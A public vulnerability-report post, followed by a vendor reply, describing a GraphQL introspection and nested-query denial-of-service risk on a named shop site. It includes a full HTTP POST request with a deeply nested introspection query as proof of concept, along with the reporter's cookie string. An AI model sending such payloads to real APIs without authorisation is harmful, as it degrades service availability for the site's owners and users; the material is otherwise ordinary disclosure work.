GraphQL Introspection Allowed exposed
K
Karim Habeeb
Your web application's GraphQL API has been identified to allow nested queries with circular relationships through introspection. This configuration can lead to complex queries that consume an excessive amount of resources, potentially resulting in a Denial of Service (DoS) attack that reduces the availability of your GraphQL API and affects the overall performance of your web application.
POST /api/graphql HTTP/1.1
Content-Type: application/json
Accept:
/
Cookie: localization=GB; _tracking_consent=%7B%22con%22%3A%7B%22CMP%22%3A%7B%22a%22%3A%22%22%2C%22m%22%3A%22%22%2C%22p%22%3A%22%22%2C%22s%22%3A%22%22%7D%7D%2C%22v%22%3A%222.1%22%2C%22region%22%3A%22DENW%22%2C%22reg%22%3A%22%22%2C%22purposes%22%3A%7B%22a%22%3Afalse%2C%22p%22%3Afalse%2C%22m%22%3Afalse%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Atrue%2C%22sale_of_data_region%22%3Afalse%2C%22consent_id%22%3A%220E1087C7-1c66-4699-b905-8523f4c07463%22%7D
Content-Length: 155
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Host: shop.sensay.io
Connection: Keep-alive
{"query":"query inv { __schema { types { fields { type { fields { type { fields { type { fields { type { name } } } } } } } } } } }","operationName":"inv"}
B
Ben Peeri
Hi Karim,
Thank you for taking the time to share this information regarding the GraphQL introspection and potential DoS risk.
Please note that public posts are not considered valid submissions under our security bounty process. To be eligible for bounty consideration and proper triage, all reports must be submitted privately and in accordance with our official guidelines.
You can find the full details on how to submit eligible findings — including report formatting, proof-of-concept expectations, and reward criteria — at the following link:
https://sensay.io/bug-bounty/terms/security-bounty-program
We appreciate your efforts in helping improve Sensay’s security posture and look forward to reviewing any future submissions that follow our program process.